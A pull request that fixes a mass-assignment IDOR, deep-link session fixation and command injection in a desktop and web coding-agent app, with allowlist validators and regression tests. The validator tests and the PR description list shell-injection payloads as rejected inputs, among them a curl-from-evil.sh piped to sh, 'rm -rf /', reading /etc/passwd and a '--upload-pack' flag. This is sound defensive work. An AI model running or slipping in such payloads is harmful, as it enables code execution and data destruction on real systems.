### PR TITLE
Fix/security issues

### DIFF
--- a/packages/desktop/src/deeplinks.ts
+++ b/packages/desktop/src/deeplinks.ts
@@ -1,14 +1,19 @@
 import { app } from "electron";
+import path from "node:path";
 
 const PROTOCOL = "background-agents";
 
 export function setupDeepLinks(handler: (url: string) => void) {
   // Register protocol handler
   if (process.defaultApp) {
-    // Development: pass the script path
+    // Development: register electron + the app script as the launch command.
+    // Use an ABSOLUTE script path — the OS launches the protocol handler from
+    // an arbitrary working directory, so a relative `process.argv[1]` (e.g.
+    // "dist/main.js" when started via `electron dist/main.js`) fails to resolve
+    // and Windows reports "error launching app with path".
     if (process.argv.length >= 2) {
       app.setAsDefaultProtocolClient(PROTOCOL, process.execPath, [
-        process.argv[1],
+        path.resolve(process.argv[1]),
       ]);
     }
   } else {

--- a/packages/desktop/src/main.ts
+++ b/packages/desktop/src/main.ts
@@ -9,6 +9,7 @@ import {
 } from "electron";
 import path from "path";
 import { fileURLToPath } from "url";
+import { randomUUID } from "node:crypto";
 import { createTray, updateTrayMenu } from "./tray.js";
 import { registerShortcuts, unregisterShortcuts } from "./shortcuts.js";
 import { setupDeepLinks } from "./deeplinks.js";
@@ -28,6 +29,22 @@ const BACKEND_URL = process.env.BACKGROUND_AGENTS_URL || DEFAULT_BACKEND_URL;
 
 let mainWindow: BrowserWindow | null = null;
 let isQuitting = false;
+
+// One-time state minted when we open the OAuth flow, used to correlate the
+// returning `background-agents://auth` deep link with a flow this app actually
+// started. Prevents deep-link session fixation (an arbitrary page/email firing
+// the deep link to swap in an attacker-controlled JWT).
+let pendingAuthState: string | null = null;
+
+// Open the desktop OAuth flow in the system browser, minting a fresh one-time
+// state that the returning auth deep link must echo back. Both entry points
+// (the in-window `will-navigate` interception and the renderer's
+// `signInWithGitHub` → `open-external` IPC) funnel through here so a state is
+// always minted; the main process is the trust boundary, not the page.
+function openAuthFlow(origin: string) {
+  pendingAuthState = randomUUID();
+  shell.openExternal(`${origin}/auth/electron-start?state=${pendingAuthState}`);
+}
 
 function createWindow() {
   mainWindow = new BrowserWindow({
@@ -75,8 +92,7 @@ function createWindow() {
     // Note: This only triggers for navigation within the Electron window, not in the system browser
     if (url.includes("/api/auth/signin")) {
       event.preventDefault();
-      const baseUrl = new URL(BACKEND_URL);
-      shell.openExternal(`${baseUrl.origin}/auth/electron-start`);
+      openAuthFlow(new URL(BACKEND_URL).origin);
     }
   });
 
@@ -135,6 +151,19 @@ async function handleDeepLink(url: string) {
 
     // Handle auth with JWT token - set session cookie and reload
     if (action === "auth" && params.token) {
+      // Only accept a token whose state matches the one we minted when opening
+      // the flow. Without this, any page/email that triggers the deep link
+      // could swap the session cookie for an attacker's JWT (session fixation).
+      // On mismatch we reject but keep pendingAuthState so a stray/hostile link
+      // can't cancel a legitimate in-flight login; we only consume it on match.
+      if (!pendingAuthState || params.state !== pendingAuthState) {
+        console.error(
+          "Rejected auth deep link: missing or mismatched state parameter"
+        );
+        return;
+      }
+      pendingAuthState = null;
+
       console.log("Auth token received, setting session cookie...");
 
       try {
@@ -285,6 +314,24 @@ ipcMain.handle("set-auth-token", async (_event, _token: string) => {
 
 // Open external URL
 ipcMain.on("open-external", (_event, url: string) => {
+  // When the renderer kicks off the desktop OAuth flow (signInWithGitHub),
+  // route it through openAuthFlow so a one-time state is minted in the main
+  // process — otherwise the returning auth deep link would carry no state and
+  // be rejected. Any state the renderer put on the URL is intentionally ignored
+  // and replaced with a main-minted one.
+  try {
+    const parsed = new URL(url);
+    const backendOrigin = new URL(BACKEND_URL).origin;
+    if (
+      parsed.origin === backendOrigin &&
+      parsed.pathname === "/auth/electron-start"
+    ) {
+      openAuthFlow(parsed.origin);
+      return;
+    }
+  } catch {
+    // Not a parseable absolute URL — fall through to a plain open.
+  }
   shell.openExternal(url);
 });
 

--- a/packages/web/app/api/chats/[chatId]/route.ts
+++ b/packages/web/app/api/chats/[chatId]/route.ts
@@ -240,12 +240,17 @@ interface PatchChatBody {
   repo?: string
   baseBranch?: string
   branch?: string
-  sandboxId?: string
-  sessionId?: string
-  previewUrlPattern?: string
-  backgroundSessionId?: string | null
   needsSync?: boolean
   lastActiveAt?: number
+  // NOTE: sandboxId, sessionId, previewUrlPattern and backgroundSessionId are
+  // intentionally NOT accepted here. They are server-managed — written only by
+  // the message/stream flow (ensure-sandbox, persist-turn, persist-snapshot) —
+  // and pointer resources that access control now trusts on the chat row (e.g.
+  // /api/agent/stream derives the sandbox from the chat row rather than the URL,
+  // see e2e/idor.spec.ts). Accepting them from the client would let a user
+  // rewrite their own chat to point at another user's sandbox/session and read
+  // that victim's agent stream — a mass-assignment path back into the IDOR that
+  // fix closed. Keep these off the client-writable surface.
 }
 
 export async function PATCH(
@@ -279,10 +284,8 @@ export async function PATCH(
     if (body.repo !== undefined) updateData.repo = body.repo
     if (body.baseBranch !== undefined) updateData.baseBranch = body.baseBranch
     if (body.branch !== undefined) updateData.branch = body.branch
-    if (body.sandboxId !== undefined) updateData.sandboxId = body.sandboxId
-    if (body.sessionId !== undefined) updateData.sessionId = body.sessionId
-    if (body.previewUrlPattern !== undefined) updateData.previewUrlPattern = body.previewUrlPattern
-    if (body.backgroundSessionId !== undefined) updateData.backgroundSessionId = body.backgroundSessionId
+    // sandboxId / sessionId / previewUrlPattern / backgroundSessionId are
+    // deliberately not copied from the body — see PatchChatBody note above.
     if (body.needsSync !== undefined) updateData.needsSync = body.needsSync
     if (body.lastActiveAt !== undefined) updateData.lastActiveAt = new Date(body.lastActiveAt)
 

--- a/packages/web/app/api/sandbox/git/route.ts
+++ b/packages/web/app/api/sandbox/git/route.ts
@@ -1,7 +1,7 @@
 import { Daytona } from "@daytonaio/sdk"
 import { createSandboxGit } from "@background-agents/sandbox-git"
 import { ensureSandboxStarted } from "@/lib/sandbox"
-import { PATHS } from "@/lib/constants"
+import { isSafeRepoPath, isSafeBranchName, isSafeRepoSegment } from "@/lib/git/ref-validation"
 import { clearPushFailureMessages, createGitOperationMessage } from "@/lib/db/git-messages"
 import { requireGitHubAuth, isGitHubAuthError, verifySandboxOwnership, forbidden } from "@/lib/db/api-helpers"
 import {
@@ -81,6 +81,28 @@ export async function POST(req: Request) {
   // against another user's sandbox/repo.
   if (!(await verifySandboxOwnership(userId, sandboxId))) {
     return forbidden()
+  }
+
+  // Reject any interpolated value carrying shell/URL metacharacters before it
+  // reaches a command or GitHub URL below (see the injection-guard helpers).
+  if (!isSafeRepoPath(repoPath)) {
+    return Response.json({ error: "Invalid repoPath" }, { status: 400 })
+  }
+  for (const [name, value] of [
+    ["currentBranch", currentBranch],
+    ["targetBranch", targetBranch],
+  ] as const) {
+    if (value !== undefined && !isSafeBranchName(value)) {
+      return Response.json({ error: `Invalid ${name}` }, { status: 400 })
+    }
+  }
+  for (const [name, value] of [
+    ["repoOwner", repoOwner],
+    ["repoApiName", repoApiName],
+  ] as const) {
+    if (value !== undefined && !isSafeRepoSegment(value)) {
+      return Response.json({ error: `Invalid ${name}` }, { status: 400 })
+    }
   }
 
   const daytonaApiKey = process.env.DAYTONA_API_KEY

--- a/packages/web/app/auth/electron-start/page.tsx
+++ b/packages/web/app/auth/electron-start/page.tsx
@@ -28,11 +28,14 @@ export default function ElectronStartPage() {
       // Already authenticated - generate token and redirect to Electron
       generateTokenAndRedirect()
     } else if (status === "unauthenticated") {
-      // Not authenticated - start OAuth flow
-      // callbackUrl points back to this page after OAuth completes
-      signIn("github", {
-        callbackUrl: "/auth/electron-start",
-      })
+      // Not authenticated - start OAuth flow. Preserve the desktop-supplied
+      // `state` across the round-trip by carrying it on the callbackUrl, so the
+      // final deep link can echo it back for the app to verify (anti-fixation).
+      const state = new URLSearchParams(window.location.search).get("state")
+      const callbackUrl = state
+        ? `/auth/electron-start?state=${encodeURIComponent(state)}`
+        : "/auth/electron-start"
+      signIn("github", { callbackUrl })
     }
   }, [status, session])
 
@@ -56,8 +59,12 @@ export default function ElectronStartPage() {
       // Mark as redirected to show success message
       setRedirected(true)
 
-      // Redirect to Electron via deep link
-      window.location.href = `background-agents://auth?token=${encodeURIComponent(token)}`
+      // Redirect to Electron via deep link, echoing back the one-time `state`
+      // the desktop app minted so it can confirm this token belongs to the
+      // flow it started (prevents deep-link session fixation).
+      const state = new URLSearchParams(window.location.search).get("state")
+      const stateParam = state ? `&state=${encodeURIComponent(state)}` : ""
+      window.location.href = `background-agents://auth?token=${encodeURIComponent(token)}${stateParam}`
     } catch (err) {
       setError(err instanceof Error ? err.message : "Unknown error")
       setRedirecting(false)

--- a/packages/web/e2e/chat-mass-assignment.spec.ts
+++ b/packages/web/e2e/chat-mass-assignment.spec.ts
@@ -1,0 +1,80 @@
+/**
+ * Mass-assignment regression test for PATCH /api/chats/[chatId].
+ *
+ * The /api/agent/stream IDOR fix (see idor.spec.ts) hardened stream access to
+ * trust the *chat row*: it derives sandboxId/backgroundSessionId from the
+ * auth-checked chat rather than the URL. That made the chat row a trusted
+ * pointer — so it must not be freely rewritable by the client.
+ *
+ * Before this fix, PATCH copied client-supplied `sandboxId`, `sessionId`,
+ * `previewUrlPattern` and `backgroundSessionId` straight into the chat row
+ * after only verifying ownership of the chat. A user could therefore point
+ * their own chat at another user's sandbox/session and then read the victim's
+ * agent stream — re-opening the IDOR through mass assignment.
+ *
+ * After the fix these four fields are server-managed and rejected by PATCH.
+ * This test PATCHes them with blatantly foreign values and asserts the chat
+ * row is unchanged.
+ */
+
+import { test, expect } from "@playwright/test"
+
+test("PATCH /api/chats ignores client-supplied server-managed pointers", async ({ request }) => {
+  // Pure HTTP test (no page render) — authenticate by fetching a test session
+  // token and sending it as the next-auth cookie on each request.
+  const authResp = await request.post("/api/test/auth")
+  expect(authResp.ok()).toBeTruthy()
+  const { token } = await authResp.json()
+  const headers = { Cookie: `next-auth.session-token=${token}` }
+
+  // Fresh chat: sandboxId/sessionId/backgroundSessionId are all null.
+  const createResp = await request.post("/api/chats", {
+    headers,
+    data: {
+      repo: "__new__",
+      baseBranch: "main",
+      agent: "eliza",
+      model: "eliza-classic-1.0",
+      status: "pending",
+    },
+  })
+  expect(createResp.ok()).toBeTruthy()
+  const { id: chatId } = await createResp.json()
+
+  const FAKE_SANDBOX = "FAKE-FOREIGN-SANDBOX-FROM-MASS-ASSIGN-TEST"
+  const FAKE_SESSION = "FAKE-FOREIGN-SESSION"
+  const FAKE_BG = "FAKE-FOREIGN-BG-SESSION"
+
+  // Attempt to rewrite the trusted pointers. `displayName` is a legitimately
+  // client-writable field — include it so the request still performs a real
+  // update and we prove the write path ran but dropped the sensitive fields.
+  const patchResp = await request.patch(`/api/chats/${chatId}`, {
+    headers,
+    data: {
+      displayName: "renamed-ok",
+      sandboxId: FAKE_SANDBOX,
+      sessionId: FAKE_SESSION,
+      previewUrlPattern: "https://evil.example/{{PORT}}",
+      backgroundSessionId: FAKE_BG,
+    },
+  })
+  expect(patchResp.ok()).toBeTruthy()
+
+  const patched = await patchResp.json()
+  // The legitimate field was applied…
+  expect(patched.displayName).toBe("renamed-ok")
+  // …but the server-managed pointers were NOT accepted from the client.
+  expect(patched.sandboxId).toBeNull()
+  expect(patched.sessionId).toBeNull()
+  expect(patched.backgroundSessionId).toBeNull()
+  expect(patched.previewUrlPattern).not.toBe("https://evil.example/{{PORT}}")
+
+  // Re-read to confirm the rejection was persisted, not just absent from the
+  // response projection.
+  const getResp = await request.get(`/api/chats/${chatId}`, { headers })
+  expect(getResp.ok()).toBeTruthy()
+  const fetched = await getResp.json()
+  expect(fetched.sandboxId).toBeNull()
+  expect(fetched.sessionId).toBeNull()
+  expect(fetched.backgroundSessionId).toBeNull()
+})

--- a/packages/web/lib/git/ref-validation.test.ts
+++ b/packages/web/lib/git/ref-validation.test.ts
@@ -1,0 +1,71 @@
+import { describe, it, expect } from "vitest"
+import { isSafeRepoPath, isSafeBranchName, isSafeRepoSegment } from "./ref-validation"
+
+describe("isSafeRepoPath", () => {
+  it("accepts the app's real sandbox paths", () => {
+    expect(isSafeRepoPath("/home/daytona/project")).toBe(true)
+    expect(isSafeRepoPath("/workspace/repo-name.2")).toBe(true)
+  })
+
+  it("rejects shell-injection payloads and traversal", () => {
+    for (const bad of [
+      "/x; curl evil.sh | sh; #",
+      "/x && rm -rf /",
+      "/x`id`",
+      "/x$(id)",
+      "/x | cat /etc/passwd",
+      "/x\nwhoami",
+      "/home/../etc",
+      "relative/path", // not absolute
+      "",
+      42,
+      null,
+      undefined,
+    ]) {
+      expect(isSafeRepoPath(bad as unknown)).toBe(false)
+    }
+  })
+})
+
+describe("isSafeBranchName", () => {
+  it("accepts the app's real branch names", () => {
+    for (const ok of ["main", "feat/token-track", "fix/security-issues", "release-1.2.3", "_cleanup/rebase-123"]) {
+      expect(isSafeBranchName(ok)).toBe(true)
+    }
+  })
+
+  it("rejects shell/URL metacharacters, flags and traversal", () => {
+    for (const bad of [
+      "main; rm -rf /",
+      "$(id)",
+      "`id`",
+      "a|b",
+      "a b",
+      "a&b",
+      "--upload-pack=evil",
+      "-x",
+      "/leading-slash",
+      "trailing/",
+      "a..b",
+      "feature#frag",
+      "",
+      null,
+    ]) {
+      expect(isSafeBranchName(bad as unknown)).toBe(false)
+    }
+  })
+})
+
+describe("isSafeRepoSegment", () => {
+  it("accepts real GitHub owners and repo names", () => {
+    for (const ok of ["jamesmurdza", "background-agents", "next.js", "a_b-c.d"]) {
+      expect(isSafeRepoSegment(ok)).toBe(true)
+    }
+  })
+
+  it("rejects injection payloads and path separators", () => {
+    for (const bad of ["a/b", "a; id", "$(id)", "a b", "-flag", "..", "owner`x`", ""]) {
+      expect(isSafeRepoSegment(bad as unknown)).toBe(false)
+    }
+  })
+})

--- a/packages/web/lib/git/ref-validation.ts
+++ b/packages/web/lib/git/ref-validation.ts
@@ -1,0 +1,46 @@
+/**
+ * Allowlist validators for values that get interpolated into sandbox shell
+ * commands and GitHub API URLs (see app/api/sandbox/git/route.ts and the git
+ * helpers it calls). The route validates request-body values against these at a
+ * single choke point so no downstream command/URL can be injected. The
+ * allowlists intentionally contain no shell or URL metacharacters; the app's
+ * own values (paths like `/home/daytona/project`, refs like `feat/x`) all pass.
+ */
+
+/** Absolute POSIX path, safe charset, no traversal. */
+export function isSafeRepoPath(v: unknown): v is string {
+  return (
+    typeof v === "string" &&
+    v.length > 0 &&
+    v.length <= 512 &&
+    v.startsWith("/") &&
+    /^[A-Za-z0-9._/-]+$/.test(v) &&
+    !v.includes("..")
+  )
+}
+
+/** Conservative git ref name: no leading '-'/'/', no trailing '/', no '..'. */
+export function isSafeBranchName(v: unknown): v is string {
+  return (
+    typeof v === "string" &&
+    v.length > 0 &&
+    v.length <= 255 &&
+    /^[A-Za-z0-9._/-]+$/.test(v) &&
+    !v.startsWith("-") &&
+    !v.startsWith("/") &&
+    !v.endsWith("/") &&
+    !v.includes("..")
+  )
+}
+
+/** GitHub owner or repo name: alphanumerics plus . _ -, no leading '-'. */
+export function isSafeRepoSegment(v: unknown): v is string {
+  return (
+    typeof v === "string" &&
+    v.length > 0 &&
+    v.length <= 100 &&
+    /^[A-Za-z0-9._-]+$/.test(v) &&
+    !v.startsWith("-") &&
+    !v.includes("..")
+  )
+}

--- a/packages/web/lib/query/hooks/useUpdateChatMutation.ts
+++ b/packages/web/lib/query/hooks/useUpdateChatMutation.ts
@@ -28,10 +28,8 @@ function applyChatUpdate(chat: Chat, data: UpdateChatData): Chat {
   if (data.repo !== undefined) updated.repo = data.repo
   if (data.baseBranch !== undefined) updated.baseBranch = data.baseBranch
   if (data.branch !== undefined) updated.branch = data.branch
-  if (data.sandboxId !== undefined) updated.sandboxId = data.sandboxId
-  if (data.sessionId !== undefined) updated.sessionId = data.sessionId
-  if (data.previewUrlPattern !== undefined) updated.previewUrlPattern = data.previewUrlPattern
-  if (data.backgroundSessionId !== undefined) updated.backgroundSessionId = data.backgroundSessionId ?? undefined
+  // sandboxId / sessionId / previewUrlPattern / backgroundSessionId are
+  // server-managed (see updateChat type) and never part of `data` here.
   if (data.needsSync !== undefined) updated.needsSync = data.needsSync
   if (data.lastActiveAt !== undefined) updated.lastActiveAt = data.lastActiveAt
   return updated

--- a/packages/web/lib/sync/api.ts
+++ b/packages/web/lib/sync/api.ts
@@ -172,12 +172,10 @@ export async function updateChat(
     repo: string
     baseBranch: string
     branch: string | null
-    sandboxId: string
-    sessionId: string
-    previewUrlPattern: string
-    backgroundSessionId: string | null
     needsSync: boolean
     lastActiveAt: number
+    // sandboxId / sessionId / previewUrlPattern / backgroundSessionId are
+    // server-managed and rejected by PATCH /api/chats/[chatId] — never send them.
   }>
 ): Promise<ChatResponse> {
   return fetchApi<ChatResponse>(`/api/chats/${chatId}`, {


### PR DESCRIPTION
 # Fix security issues: IDOR, session fixation, command injection


  ## Mass-assignment IDOR in `PATCH /api/chats/[chatId]` 

  `PATCH` verified ownership of the chat *row*, then copied client-supplied
  `sandboxId`, `sessionId`, `previewUrlPattern`, and `backgroundSessionId`
  straight into it. Since `/api/agent/stream` was hardened to trust those pointers
  on the chat row, a user could point their own chat at **another user's**
  sandbox/session and read the victim's agent stream — reopening the previously
  closed stream IDOR via mass assignment.

  **Fix:** these fields are server-managed (written only by the message/stream
  flow). Stop accepting them from the client entirely — dropped from the `PATCH`
  body and the client `updateChat` type. Added an e2e regression
  (`chat-mass-assignment.spec.ts`).

  ## Desktop deep-link session fixation

  `handleDeepLink` wrote any `background-agents://auth?token=<JWT>` straight into
  the NextAuth session cookie with no correlation to a flow the app started. Any
  page or email that fires the deep link could silently log the victim into an
  **attacker-controlled** account.

  **Fix:** mint a one-time `state` in the main process when opening the OAuth flow
  (covering both entry points — the `will-navigate` interception and the
  renderer's `signInWithGitHub` → `open-external` IPC), thread it through
  `/auth/electron-start`, and reject auth deep links whose `state` doesn't match.
  The state is consumed on success and preserved on mismatch so a hostile link
  can't cancel a legitimate in-flight login. Manually verified end-to-end (login
  works; a state-less/mismatched link is rejected).

  ## Command injection in `POST /api/sandbox/git` 

  `repoPath`, `currentBranch`, `targetBranch`, `repoOwner`, and `repoApiName` were
  interpolated raw into sandbox shell commands
  (`cd ${repoPath} && git merge origin/${currentBranch}`) and GitHub API URLs,
  here and in the git helpers. A body like `repoPath: "/x; curl evil.sh | sh; #"`
  executed arbitrary commands. (Severity is bounded — an ownership check limits it
  to a sandbox the caller already controls — but the sink is real.)

  **Fix:** strict allowlist validators (`lib/git/ref-validation.ts`) applied at
  the route's single choke point, rejecting any value with shell/URL
  metacharacters, traversal, or leading-dash flags. Covers the helpers too, since
  all client input passes this boundary. Unit tested (`ref-validation.test.ts`).

  ## Supporting: dev deep-link registration fix

  In dev, the `background-agents://` protocol was registered with a relative
  `process.argv[1]`, so the OS launched it from the wrong cwd and Windows reported
  "error launching app with path", breaking auth deep links. Register an absolute
  path. Dev-only — packaged builds were already correct.

